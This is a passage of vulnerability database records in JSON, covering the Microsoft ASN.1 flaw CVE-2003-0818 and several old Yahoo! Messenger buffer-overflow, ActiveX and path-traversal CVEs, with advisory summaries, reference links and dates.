"url": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill"
},
{
"trust": 0.1,
"url": "http://metasploit.com/framework/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2003-0818"
},
{
"trust": 0.1,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/583108\u003e"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms04-007.asp\u003e"
},
{
"trust": 0.1,
"url": "http://support.microsoft.com/default.aspx?scid=252648\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/216324\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html\u003e"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2004-03-03T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2005-04-21T00:00:00",
"db": "BID",
"id": "13300"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9633"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2009-11-26T00:34:53",
"db": "PACKETSTORM",
"id": "83044"
},
{
"date": "2004-02-11T02:24:00",
"db": "PACKETSTORM",
"id": "32667"
},
{
"date": "2003-11-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2004-03-03T05:00:00",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-11T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2019-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2009-07-12T14:06:00",
"db": "BID",
"id": "13300"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9633"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2019-05-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft ASN.1 Library improperly decodes constructed bit strings",
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
}
}
CVE-2014-7216 (GCVE-0-2014-7216)
Vulnerability from nvd – Published: 2015-09-11 20:00 – Updated: 2024-08-06 12:40
VLAI?
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T12:40:19.202Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-09-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-7216",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/",
"refsource": "MISC",
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"name": "https://hackerone.com/reports/10767",
"refsource": "MISC",
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"name": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-7216",
"datePublished": "2015-09-11T20:00:00",
"dateReserved": "2014-09-28T00:00:00",
"dateUpdated": "2024-08-06T12:40:19.202Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-0268 (GCVE-0-2012-0268)
Vulnerability from nvd – Published: 2012-01-19 15:00 – Updated: 2024-09-17 01:46
VLAI?
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:16:20.094Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-01-19T15:00:00Z",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47041"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2012-0268",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "47041",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47041"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2012-0268",
"datePublished": "2012-01-19T15:00:00Z",
"dateReserved": "2011-12-30T00:00:00Z",
"dateUpdated": "2024-09-17T01:46:26.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2009-4171 (GCVE-0-2009-4171)
Vulnerability from nvd – Published: 2009-12-02 19:00 – Updated: 2024-08-07 06:54
VLAI?
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T06:54:09.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2009-11-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2009-4171",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/37007"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2009-4171",
"datePublished": "2009-12-02T19:00:00",
"dateReserved": "2009-12-02T00:00:00",
"dateUpdated": "2024-08-07T06:54:09.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-5017 (GCVE-0-2007-5017)
Vulnerability from nvd – Published: 2007-09-20 21:00 – Updated: 2024-08-07 15:17
VLAI?
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:17:28.168Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-09-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-09-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-5017",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html",
"refsource": "MISC",
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"refsource": "OSVDB",
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018715"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-5017",
"datePublished": "2007-09-20T21:00:00",
"dateReserved": "2007-09-20T00:00:00",
"dateUpdated": "2024-08-07T15:17:28.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4635 (GCVE-0-2007-4635)
Vulnerability from nvd – Published: 2007-08-31 23:00 – Updated: 2024-09-16 16:32
VLAI?
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:10.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-08-31T23:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4635",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "25484",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25484"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4635",
"datePublished": "2007-08-31T23:00:00Z",
"dateReserved": "2007-08-31T00:00:00Z",
"dateUpdated": "2024-09-16T16:32:44.068Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4515 (GCVE-0-2007-4515)
Vulnerability from nvd – Published: 2007-08-31 22:00 – Updated: 2024-08-07 15:01
VLAI?
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:09.859Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
